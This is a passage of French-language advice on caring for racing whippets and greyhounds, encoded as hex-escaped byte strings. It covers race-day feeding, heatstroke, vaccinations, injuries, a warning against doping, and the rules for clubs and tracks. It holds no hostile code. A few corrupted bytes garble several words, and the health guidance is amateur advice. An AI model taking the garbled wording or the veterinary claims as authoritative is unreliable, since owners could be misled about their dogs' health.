-"\x70\x61\x73\x20\x75\x6e\x20\x72\x65\x70\x61\x73\x20\x63\x6f\x6d"
-"\x70\x6c\x65\x74\x20\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x65\x73"
-"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x46\x61\x69\x74\x65\x73"
-"\x20\x62\x6f\x69\x72\x65\x20\x6d\x6f\x64\xe9\x72\xe9\x6d\x65\x6e"
-"\x74\x2c\x20\x64\x65\x20\x6c\x27\x65\x61\x75\x20\x6e\x6f\x6e\x20"
-"\x67\x6c\x61\x63\xe9\x65\x2c\x20\x61\x70\x72\xe8\x73\x20\x6c\x65"
-"\x96\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x0d\x53\x6f\x69\x6e"
-"\x73\x20\x3a\x0d\x0d\x09\x43\x68\x61\x6c\x65\x75\x72\x73\x20\x3a"
-"\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74"
-"\x20\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65"
-"\x6d\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72"
-"\x73\x20\x61\x75\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20"
-"\x63\x65\x6c\x61\x20\x76\x61\x20\x70\x65\x72\x74\x75\x72\x62\x65"
-"\x72\x20\x6d\xe2\x6c\x65\x73\x20\x65\x74\x20\x66\x65\x6d\x65\x6c"
-"\x6c\x65\x73\x2e\x0d\x0d\x09\x56\x61\x63\x63\x69\x6e\x73\x3a\x0d"
-"\x4c\x61\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20\x61"
-"\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x65\x73\x74\x20\x6f"
-"\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x0d\x4c\x65\x73\x20"
-"\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x73\x20\x63\x6f\x75"
-"\x72\x61\x6e\x74\x65\x73\x20\x73\x6f\x6e\x74\x20\xe0\x20\x63\x6f"
-"\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2e\x0d\x0d\x09\x4d\x61\x73\x73"
-"\x61\x67\x65\x73\x20\x65\x74\x20\xe9\x63\x68\x61\x75\x66\x66\x65"
-"\x6d\x65\x6e\x74\x20\x3a\x0d\x49\x6c\x73\x20\x73\x6f\x6e\x74\x20"
-"\xe0\x20\x63\x6f\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2c\x20\x63\x6f"
-"\x6d\x6d\x65\x20\x6c\x61\x20\x64\xe9\x74\x65\x6e\x74\x65\x20\x61"
-"\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x2e\x0d"
-"\x0d\x09\x54\xe9\x74\x61\x6e\x69\x65\x20\x3a\x0d\x43\x72\x69\x73"
-"\x65\x20\x6e\x65\x72\x76\x65\x75\x73\x65\x20\x73\x6f\x69\x74\x20"
-"\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20"
-"\x28\x73\x70\x65\x63\x74\x61\x63\x75\x6c\x61\x69\x72\x65\x20\x65"
-"\x74\x20\x62\x72\xe8\x76\x65\x29\x20\x73\x6f\x69\x74\x20\x70\x65"
-"\x6e\x64\x61\x6e\x74\x20\x6c\x61\x20\x6c\x61\x63\x74\x61\x74\x69"
-"\x6f\x6e\x2c\x20\x73\x75\x72\x74\x6f\x75\x74\x20\x20\x73\x69\x20"
-"\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\x64\x6f\x6e\x6e\xe9\x20"
-"\x64\x65\x73\x20\x73\x75\x70\x70\x6c\xe9\x6d\x65\x6e\x74\x73\x20"
-"\x64\x65\x20\x63\x61\x6c\x63\x69\x75\x6d\x20\x70\x65\x6e\x64\x61"
-"\x6e\x74\x20\x6c\x61\x20\x67\x65\x73\x74\x61\x74\x69\x6f\x6e\x2e"
-"\x0d\x0d\x09\x50\x69\x73\x73\x65\x6d\x65\x6e\x74\x20\x64\x65\x20"
-"\x73\x61\x6e\x67\x20\x28\x72\x68\x61\x62\x64\x6f\x6d\x79\x6f\x6c"
-"\x79\x73\x65\x29\x3a\x0d\x55\x72\x69\x6e\x65\x73\x20\x62\x72\x75"
-"\x6e\x65\x73\x20\x74\x72\x61\x64\x75\x69\x73\x61\x6e\x74\x20\x73"
-"\x6f\x69\x74\x20\x75\x6e\x65\x20\x70\x69\x72\x6f\x70\x6c\x61\x73"
-"\x6d\x6f\x73\x65\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x6d"
-"\x69\x63\x72\x6f\x63\x6c\x61\x71\x75\x61\x67\x65\x73\x20\x65\x6e"
-"\x20\x63\x6f\x75\x72\x73\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x75"
-"\x6e\x65\x20\x61\x75\x74\x72\x65\x20\x6d\x61\x6c\x61\x64\x69\x65"
-"\x2e\x0d\x0d\x09\x43\x6f\x75\x70\x20\x64\x65\x20\x63\x68\x61\x6c"
-"\x65\x75\x72\x20\x3a\x0d\x41\x63\x63\x69\x64\x65\x6e\x74\x20\x67"
-"\xe7\x61\x76\x65\x20\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f"
-"\x75\x72\x73\x65\x2c\x20\x73\x27\x69\x6c\x20\x66\x61\x69\x74\x20"
-"\x63\x68\x61\x75\x64\x2c\x20\x73\x27\x69\x6c\x20\x79\x20\x61\x20"
-"\x65\x75\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20\x64\x6f\x70\x61"
-"\x6e\x74\x73\x2c\x20\x73\x69\x20\x6c\x65\x20\x73\x75\x6a\x65\x74"
-"\x20\x65\x73\x74\x20\x65\x6e\x20\x6d\x61\x75\x76\x61\x69\x73\x65"
-"\x20\xe9\x74\x61\x74\x2e\x20\x4c\x61\x20\x74\x65\x6d\x70\xe9\x72"
-"\x61\x74\x75\x72\x65\x20\x6d\x6f\x6e\x74\x65\x20\xe0\x20\x70\x6c"
-"\x75\x73\x20\x64\x65\x20\x34\x30\x2e\x20\x52\x65\x66\x72\x6f\x69"
-"\x64\x69\x72\x20\x6c\x65\x20\x63\x6f\x72\x70\x73\x20\x65\x74\x20"
-"\x6c\x61\x20\x74\xea\x74\x65\x20\x65\x74\x20\x70\x6f\x72\x74\x65"
-"\x72\x20\x63\x68\x65\x7a\x20\x75\x6e\x20\x76\xe9\x74\xe9\x72\x69"
-"\x6e\x61\x69\x72\x65\x2e\x0d\x0d\x09\x43\x6c\x61\x71\x75\x61\x67"
-"\x65\x73\x2c\x20\x66\x72\x61\x63\x99\x75\x72\x65\x73\x20\x3a\x0d"
-"\x41\x73\x73\x65\x7a\x20\x72\x61\x72\x65\x73\x2e\x20\x53\x75\x72"
-"\x74\x6f\x75\x74\x20\x73\x75\x72\x20\x70\x69\x73\x74\x65\x73\x20"
-"\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65\x6e\x75\x65\x73\x20"
-"\x61\x76\x65\x63\x20\x7a\x6f\x6e\x65\x73\x20\x64\x75\x72\x65\x73"
-"\x20\x65\x74\x20\x6d\x6f\x6c\x6c\x65\x73\x20\x61\x6c\x74\x65\x72"
-"\x6e\xe9\x65\x73\x2c\x20\x6f\x75\x20\x73\x75\x72\x20\x64\x65\x73"
-"\x20\x63\x68\x69\x65\x6e\x73\x20\x6d\x61\x6c\x20\x6e\x6f\x75\x72"
-"\x72\x69\x73\x20\x65\x74\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61"
-"\xee\x6e\xe9\x73\x2e\x0d\x0d\x09\x47\x72\x6f\x73\x20\x64\x6f\x69"
-"\x67\x74\x73\x20\x3a\x0d\x4c\xe9\x73\x69\x6f\x6e\x73\x20\x61\x72"
-"\x74\x69\x63\x75\x6c\x61\x69\x72\x65\x73\x2c\x20\x74\x61\x6e\x74"
-"\xf4\x74\x20\x65\x6e\x74\x6f\x72\x73\x65\x73\x2c\x20\x74\x61\x6e"
-"\x74\xf4\x74\x20\x74\x65\x6e\x64\x69\x6e\x69\x74\x65\x73\x2c\x20"
-"\x74\x61\x6e\x74\xf4\x74\x20\x66\x6f\x75\x72\x62\x75\x72\x65\x2c"
-"\x20\x73\x75\x72\x20\x63\x68\x69\x65\x6e\x73\x20\x72\x61\x70\x69"
-"\x64\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x6c\x6f\x75"
-"\x72\x64\x73\x2c\x20\xe0\x20\x6c\x27\x6f\x63\x63\x61\x73\x69\x6f"
-"\x6e\x20\x64\x65\x20\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73"
-"\x2c\x20\x64\x65\x20\x6d\x61\x75\x76\x61\x69\x73\x20\x66\x72\x65"
-"\x69\x6e\x61\x67\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9"
-"\x65\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x65\x20\x70\x69"
-"\x73\x74\x65\x73\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65"
-"\x6e\x75\x65\x73\x2e\x0d\x49\x6c\x73\x20\x73\x75\x72\x76\x69\x65"
-"\x6e\x6e\x65\x6e\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x65\x6e"
-"\x20\x70\x6c\x65\x69\x6e\x65\x20\x73\x61\x69\x73\x6f\x6e\x20\x73"
-"\x75\x72\x20\x6c\x65\x73\x20\x73\x75\x6a\x65\x74\x73\x20\x66\x61"
-"\x74\x69\x67\x75\xe9\x73\x2c\x20\x6d\x61\x6c\x20\x64\xe9\x74\x6f"
-"\x78\x69\x71\x75\xe9\x73\x2e\x0d\x49\x6c\x73\x20\x70\x65\x75\x76"
-"\x65\x6e\x74\x20\xea\x74\x72\x65\x20\x62\xe9\x6e\x69\x6e\x73\x20"
-"\x6f\x75\x20\x67\x72\x61\x76\x65\x73\x2e\x0d\x53\x65\x6c\x6f\x6e"
-"\x20\x6c\x65\x73\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65"
-"\x73\x2c\x20\x6f\x6e\x20\x74\x72\x61\x69\x74\x65\x20\x70\x61\x72"
-"\x20\x63\x68\x69\x72\x75\x72\x67\x69\x65\x2c\x20\x70\x61\x72\x20"
-"\x61\x6e\x74\x69\x69\x6e\x66\x6c\x61\x6d\x6d\x61\x74\x6f\x69\x72"
-"\x65\x73\x2c\x20\x70\x61\x72\x20\x70\x61\x6e\x73\x65\x6d\x65\x6e"
-"\x74\x2c\x20\x70\x61\x72\x20\x68\xe1\x6d\xe9\x6f\x70\x61\x74\x68"
-"\x69\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x6d\xe9\x74\x68\x6f"
-"\x64\x65\x20\x61\x20\x64\x65\x73\x20\x73\x75\x63\x63\xe8\x73\x20"
-"\x6f\x75\x20\x64\x65\x73\x20\xe9\x63\x68\x65\x63\x73\x2c\x20\x73"
-"\x65\x6c\x6f\x6e\x20\x6c\x65\x73\x20\x63\x61\x73\x2e\x20\xe5\x6e"
-"\x20\x61\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x73\x69\x67\x6e\x61"
-"\x6c\xe9\x20\x64\x65\x73\x20\x63\x68\x75\x74\x65\x73\x20\x64\x65"
-"\x20\x66\x6f\x72\x6d\x65\x20\x61\x70\x72\xe8\x73\x20\x63\x6f\x72"
-"\x74\x69\x63\x6f\xef\x64\x65\x73\x2e\x0d\x0d\x09\x44\x6f\x70\x61"
-"\x67\x65\x3a\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72"
-"\x64\x69\x74\x20\x6d\x61\x69\x73\x20\x74\x72\x6f\x70\x20\x75\x74"
-"\x69\x6c\x69\x73\xe9\x2e\x0d\x4c\x61\x20\x70\x6c\x75\x70\x61\x72"
-"\x74\x20\x6e\x27\x6f\x6e\x74\x20\x61\x75\x63\x75\x6e\x65\x20\x61"
-"\x63\x74\x69\x6f\x6e\x2e\x0d\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e"
-"\x74\x73\x20\x73\x6f\x6e\x74\x20\x73\x6f\x69\x74\x20\x64\x65\x73"
-"\x20\x72\x65\x74\x61\x72\x64\x61\x74\x65\x75\x72\x73\x20\x64\x65"
-"\x20\x66\x61\x74\x69\x67\x75\x65\x20\x71\x75\x69\x20\x6e\x27\x6f"
-"\x6e\x74\x20\x64\x27\x69\x6e\x74\xe9\x72\xea\x74\x20\x74\x68\xe9"
-"\x6f\x72\x69\x71\x75\x65\x20\x71\x75\x65\x20\x70\x6f\x75\x72\x20"
-"\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x64\x65\x20\x70"
-"\x6c\x75\x73\x20\x64\x65\x20\x31\x35\x30\x30\x20\x6d\xe8\x74\x72"
-"\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x64\xe9\x66"
-"\x61\x74\x69\x67\x61\x6e\x74\x73\x20\x71\x75\x69\x20\x6e\x65\x20"
-"\x73\x65\x72\x76\x65\x6e\x74\x20\x71\x75\x27\x65\x6e\x20\x63\x61"
-"\x73\x20\x64\x65\x20\x72\xe9\x70\xe9\x74\x69\x74\x69\x6f\x6e\x20"
-"\xe0\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x6c\x65\x73\x20\x69\x6e"
-"\x73\x75\x66\x66\x69\x73\x61\x6e\x74\x73\x2c\x20\x73\x6f\x69\x74"
-"\x20\x64\x65\x73\x20\x70\x6f\x74\x65\x6e\x74\x69\x61\x6c\x69\x73"
-"\x61\x74\x65\x75\x72\x73\x20\xe0\x20\x74\x72\xe8\x73\x20\x63\x6f"
-"\x75\x72\x74\x65\x20\x64\x75\x72\xe9\x65\x20\x64\x27\x61\x63\x74"
-"\x69\x6f\x6e\x2e\x20\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e\x74\x73"
-"\x20\x73\x6f\x6e\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x64"
-"\x61\x6e\x67\x65\x72\x65\x75\x78\x20\x70\x6f\x75\x72\x20\x6c\x65"
-"\x20\x6c\xe9\x76\x72\x69\x65\x72\x2c\x20\x65\x74\x20\x69\x6c\x73"
-"\x20\x73\x6f\x6e\x74\x20\x69\x6e\x75\x74\x69\x6c\x65\x73\x20\x73"
-"\x75\x72\x20\x32\x30\x20\x73\x65\x63\x2e\x0d\x0d\x09\x52\x79\x74"
-"\x68\x6d\x65\x20\x64\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20"
-"\x3a\x0d\x45\x6e\x20\x70\x72\x69\x6e\x63\x69\x70\x65\x2c\x20\x6c"
-"\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x63"
-"\x6f\x75\x72\x69\x72\x20\x73\x6f\x75\x76\x65\x6e\x74\x2c\x20\x69"
-"\x6c\x20\x65\x73\x74\x20\x62\xe2\x74\x69\x20\x70\x6f\x75\x72\x20"
-"\x63\x65\x6c\x61\x2e\x20\x4d\x61\x69\x73\x20\x65\x6e\x20\x63\x61"
-"\x73\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e\x61\x70"
-"\x65\x72\xe7\x75\x65\x20\x69\x6c\x20\x70\x6f\x75\x72\x72\x61\x20"
-"\x79\x20\x61\x76\x6f\x69\x72\x20\x62\x6c\x65\x73\x73\x75\x72\x65"
-"\x20\x65\x74\x20\x6d\xe9\x66\x6f\x72\x6d\x65\x2c\x20\x63\x65\x20"
-"\x71\x75\x69\x20\x63\x6f\x6e\x64\x75\x69\x74\x20\x63\x65\x72\x74"
-"\x61\x69\x6e\x73\x20\xe0\x20\x6e\x65\x20\x72\xe9\x70\xe9\x74\x65"
-"\x72\x20\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x71\x75"
-"\x65\x20\x72\x61\x72\x65\x6d\x65\x6e\x74\x2e\x20\x42\x69\x65\x6e"
-"\x20\x6e\x6f\x75\x72\x72\x69\x20\x65\x74\x20\x62\x69\x65\x6e\x20"
-"\x65\x6e\x74\x72\x61\xee\x6e\xe9\x2c\x20\x69\x6c\x20\x70\x65\x75"
-"\x20\x63\x6f\x75\x72\x69\x72\x20\x74\x72\xe8\x73\x20\x66\x72\xe9"
-"\x71\x75\x65\x6d\x6d\x65\x6e\x74\x2e\x0d\x4c\x65\x20\x72\x69\x73"
-"\x71\x75\x65\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e"
-"\x61\x70\x65\x72\xe7\x75\x65\x20\x65\x73\x74\x20\x66\x69\x6e\x61"
-"\x6c\x65\x6d\x65\x6e\x74\x20\x6c\x65\x20\x70\x72\x69\x6e\x63\x69"
-"\x70\x61\x6c\x20\x63\x61\x73\x20\x63\x61\x72\x20\x69\x6c\x20\x65"
-"\x6e\x74\x72\x61\xee\x6e\x65\x72\x61\x20\x75\x6e\x20\x61\x63\x63"
-"\x69\x64\x65\x6e\x74\x2c\x20\x61\x74\x74\x72\x69\x62\x75\xe9\x20"
-"\xe0\x20\x6c\x61\x20\x70\x69\x73\x74\x65\x2c\x20\x61\x75\x20\x74"
-"\x65\x6d\x70\x73\x2c\x20\xe0\x20\x75\x6e\x20\x61\x63\x63\x69\x64"
-"\x65\x6e\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x2c\x20\x65"
-"\x74\x63\x2e\x2e\x2e\x0d\x41\x70\x72\xe8\x73\x20\x6c\x61\x20\x72"
-"\xe9\x75\x6e\x69\x6f\x6e\x20\x65\x78\x61\x6d\x69\x6e\x65\x7a\x20"
-"\x65\x74\x20\x6e\x65\x74\x74\x6f\x79\x65\x7a\x20\x6c\x65\x73\x20"
-"\x70\x69\x65\x64\x73\x2c\x20\x70\x61\x6c\x70\x65\x7a\x20\x62\x69"
-"\x65\x6e\x20\x6c\x65\x73\x20\xe9\x70\x61\x75\x6c\x65\x73\x2c\x20"
-"\x6c\x65\x73\x20\x63\x75\x69\x73\x73\x65\x73\x2c\x20\x6c\x65\x73"
-"\x20\x61\x72\x74\x69\x63\x75\x6c\x61\x74\x69\x6f\x6e\x73\x2e\x20"
-"\x45\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x64\x6f\x75\x74\x65\x2c"
-"\x20\x6d\x65\x74\x74\x65\x7a\x20\x6c\x65\x20\xe0\x20\x75\x6e\x20"
-"\x72\x65\x70\x6f\x73\x20\x72\x65\x6c\x61\x74\x69\x66\x20\x28\x70"
-"\x61\x73\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x29\x2e\x0d\x4e"
-"\x65\x20\x6c\x61\x69\x73\x73\x65\x7a\x20\x6a\x61\x6d\x61\x69\x73"
-"\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x6d\x61\x75\x76\x61"
-"\x69\x73\x20\x63\x68\x72\x6f\x6e\x6f\x20\x73\x61\x6e\x73\x20\x63"
-"\x61\x75\x73\x65\x20\x28\x64\x65\x20\x63\x68\x75\x74\x65\x29\x2c"
-"\x20\x73\x6f\x79\x65\x7a\x20\x70\x72\x75\x64\x65\x6e\x74\x20\x70"
-"\x6f\x75\x72\x20\x61\x63\x63\x65\x48\x74\x65\x72\x20\x6c\x61\x20"
-"\x63\x6f\x75\x72\x73\x65\x20\x73\x75\x69\x76\x61\x6e\x74\x65\x2e"
-"\x0d\x43\x27\x65\x73\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x75"
-"\x6e\x20\x73\x69\x67\x6e\x65\x20\x70\x72\xe9\x63\x75\x72\x73\x65"
-"\x75\x72\x20\x64\x27\x65\x6e\x6e\x75\x69\x73\x2e\x20\x55\x6e\x20"
-"\x63\x68\x69\x65\x6e\x20\x62\x69\x65\x6e\x20\x65\x6e\x74\x72\x61"
-"\xee\x6e\xe9\x20\x70\x65\x75\x74\x20\x66\x72\xe9\x71\x75\x65\x6d"
-"\x6d\x65\x6e\x74\x20\x72\xe9\x70\xe9\x74\x65\x72\x20\x73\x65\x73"
-"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x20\x55\x6e\x20\x63\x68\x69"
-"\x65\x6e\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61\xee\x6e\xe9\x20"
-"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x2e\x20\x4d\x61\x69"
-"\x73\x20\x63\x27\x65\x73\x74\x20\x61\x75\x73\x73\x69\x20\x61\x66"
-"\x66\x61\x69\x72\x65\x20\x64\x27\x69\x6e\x64\x69\x76\x69\x64\x75"
-"\x2c\x20\x61\x76\x65\x63\x20\x20\x64\x65\x20\x76\x69\x76\x65\x73"
-"\x20\x63\x6f\x6e\x74\x72\x6f\x76\x65\x72\x73\x65\x73\x2e\x0d\x0d"
-"\x51\x75\x65\x6c\x71\x75\x65\x73\x20\x72\x65\x6e\x73\x65\x69\x67"
-"\x6e\x65\x6d\x65\x6e\x74\x73\x20\x69\x6e\x74\xe9\x72\x65\x73\x73"
-"\x61\x6e\x74\x73\x20\x3a\x0d\x0d\x09\x43\x6c\x75\x62\x73\x20\x20"
-"\x61\x67\x72\xe9\xe9\x73\x20\x3a\x0d\x41\x73\x73\x6f\x63\x69\x61"
-"\x74\x69\x6f\x6e\x20\x31\x39\x30\x31\x20\x61\x67\x72\xe9\xe9\x65"
-"\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69"
-"\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x65\x6e\x20\x61"
-"\x63\x63\x6f\x72\x64\x20\x61\x76\x65\x63\x20\x6c\x61\x20\x53\x6f"
-"\x63\x69\xe9\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x6c\x6f\x63"
-"\x61\x6c\x65\x2e\x20\x49\x6c\x20\x6e\x65\x20\x70\x65\x75\x74\x20"
-"\x79\x20\x65\x6e\x20\x61\x76\x6f\x69\x72\x20\x71\x75\x27\x75\x6e"
-"\x20\x73\x65\x75\x6c\x20\x70\x61\x72\x20\x72\x61\x79\x6f\x6e\x20"
-"\x64\x65\x20\x37\x35\x4b\x6d\x20\x73\x69\x20\x6c\x61\x20\x70\x69"
-"\x73\x74\x65\x20\x65\x73\x74\x20\x72\xe9\x73\x65\x72\x76\xe9\x65"
-"\x20\x61\x75\x78\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x73\x70"
-"\x6f\x72\x74\x69\x76\x65\x73\x2c\x20\x64\x65\x20\x35\x30\x4b\x6d"
-"\x20\x73\x69\x20\x65\x6c\x6c\x65\x20\x65\x73\x74\x20\x70\x61\x72"
-"\x74\x61\x67\xe9\x65\x20\x61\x76\x65\x63\x20\x75\x6e\x65\x20\x53"
-"\x6f\x63\x69\xe9\x74\xe9\x20\xe0\x20\x50\x61\x72\x69\x20\x4d\x75"
-"\x74\x75\x65\x6c\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x70\x61\x72"
-"\x66\x61\x69\x74\x65\x6d\x65\x6e\x74\x20\x61\x75\x74\x6f\x72\x69"
-"\x73\xe9\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x64\x65\x20"
-"\x64\x69\x73\x70\x75\x74\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72"
-"\x65\x75\x76\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x46\xe9\x64\xe9"
-"\x72\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x53\x6f\x63\x69\xe9"
-"\x74\xe9\x73\x20\x64\x65\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28"
-"\x63\x6f\x75\x72\x73\x65\x73\x20\x61\x76\x65\x63\x20\x70\x61\x72"
-"\x69\x20\x6d\x75\x74\x75\x65\x6c\x29\x20\x20\x71\x75\x69\x20\x61"
-"\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65\x20\x72\xe8\x67\x6c"
-"\x65\x6d\x65\x6e\x74\x20\x28\x63\x6f\x64\x65\x20\x64\x65\x73\x20"
-"\x63\x6f\x75\x72\x73\x65\x73\x29\x20\x65\x74\x20\x73\x65\x73\x20"
-"\x70\x72\x6f\x70\x72\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74"
-"\x73\x20\x28\x6c\x69\x76\x72\x65\x74\x73\x29\x2e\x0d\x0d\x09\x43"
-"\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x73\x20\x3a\x0d\x50\x69\x73\x74"
-"\x65\x73\x20\x61\x67\x72\xe9\xe9\x65\x73\x2c\x20\x64\x6f\x6e\x74"
-"\x20\x6c\x65\x73\x20\x63\x6f\x74\x65\x73\x20\x6f\x6e\x74\x20\xe9"
-"\x74\xe9\x20\x6d\x65\x73\x75\x72\xe9\x65\x73\x20\x70\x61\x72\x20"
-"\x75\x6e\x20\x65\x78\x70\x65\x72\x74\x20\x61\x67\x72\xe9\xe9\x2c"
-"\x20\x61\x76\x65\x63\x20\x75\x6e\x20\x72\x61\x79\x6f\x6e\x20\x6d"
-"\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x34\x30\x6d\x2e\x0d\x49"
-"\x6c\x73\x20\x70\x65\x75\x76\x65\x6e\x74\x20\x61\x76\x6f\x69\x72"
-"\x20\x75\x6e\x65\x20\x70\x69\x73\x74\x65\x20\x65\x6e\x20\x68\x65"
-"\x72\x62\x65\x2c\x20\x65\x6e\x20\x73\x61\x62\x6c\x65\x2c\x20\x65"
-"\x6e\x20\x67\x61\x7a\x6f\x6e\x20\x73\x75\x72\x20\x73\x61\x62\x6c"
-"\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x73\x6f\x6c\x20\x61\x20"
-"\x73\x65\x73\x20\x64\xe9\x66\x65\x6e\x73\x65\x75\x72\x73\x20\x65"
-"\x74\x20\x73\x65\x73\x20\x64\xe9\x74\x72\x61\x63\x74\x65\x75\x72"
-"\x73\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x65\x20\x3a\x0d\x4c\x65"
-"\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73"
-"\x74\x69\x74\x75\xe9\x20\x64\x65\x20\x72\x75\x62\x61\x6e\x73\x20"
-"\x15\x6c\x61\x73\x74\x69\x71\x75\x65\x20\x70\x6f\x75\x72\x20\x6c"
-"\x65\x73\x20\x45\x4e\x43\x2c\x20\x64\x65\x20\x70\x65\x61\x75\x20"
-"\x64\x65\x20\x6c\x61\x70\x69\x6e\x20\x70\x6f\x75\x72\x20\x6c\x61"
-"\x20\x50\x56\x4c\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x6d\xfb\x20"
-"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x63\xe2\x62\x6c"
-"\x65\x20\x65\x6e\x72\x6f\x75\x6c\xe9\x20\x73\x75\x72\x20\x75\x6e"
-"\x65\x20\x62\x6f\x62\x69\x6e\x65\x20\x28\x6c\x65\x75\x72\x72\x65"
-"\x20\x66\x69\x63\x65\x6c\x6c\x65\x29\x20\x61\x76\x65\x63\x20\x70"
-"\x6f\x75\x6c\x69\x65\x73\x20\x64\x65\x20\x72\x65\x6e\x76\x6f\x69"
-"\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x73\x79"
-"\x73\x74\xe8\x6d\x65\x20\x61\x75\x74\x6f\x70\x72\x6f\x70\x75\x6c"
-"\x73\xe9\x20\x67\x75\x69\x64\xe9\x20\x70\x61\x72\x20\x75\x6e\x20"
-"\x72\x61\x69\x6c\x2e\x0d\x0d\x09\x44\x69\x73\x74\x61\x6e\x63\x65"
-"\x73\x20\x3a\x0d\x4c\x65\x73\x20\x64\x69\x73\x74\x61\x6e\x63\x65"
-"\x73\x20\x66\x72\x61\x6e\xe7\x61\x69\x73\x65\x73\x20\x73\x6f\x6e"
-"\x74\x20\x64\x27\x65\x6e\x76\x69\x72\x6f\x6e\x20\x34\x38\x30\x6d"
-"\x20\x6f\x75\x20\x32\x35\x30\x6d\x20\x64\x65\x20\x66\x61\xe7\x6f"
-"\x6e\x20\xe0\x20\x61\x76\x6f\x69\x72\x20\x64\x65\x73\x20\x64\xe9"
-"\x70\x61\x72\x74\x73\x20\x65\x6e\x20\x6c\x69\x67\x6e\x65\x20\x64"
-"\x72\x6f\x69\x74\x65\x20\x71\x75\x69\x20\x6c\x69\x6d\x69\x74\x65"
-"\x6e\x74\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x20\x65\x74\x20"
-"\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73\x2e\x20\x4c\x65\x73"
-"\x20\x64\x69\x73\x74\x61\x6e\x63\x65\x73\x20\x69\x6e\x74\x65\x72"
-"\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x70\x6f\x75\x72\x20"
-"\x6c\x65\x73\x20\x77\x68\x69\x70\x70\x65\x74\x73\x20\x73\x6f\x6e"
-"\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x6d\x6f\x6d\x65\x6e\x74"
-"\x20\x64\x65\x20\x33\x35\x30\x6d\x20\x63\x65\x20\x71\x75\x69\x20"
-"\x69\x6d\x70\x6f\x73\x65\x20\x75\x6e\x65\x20\x63\x6f\x75\x72\x74"
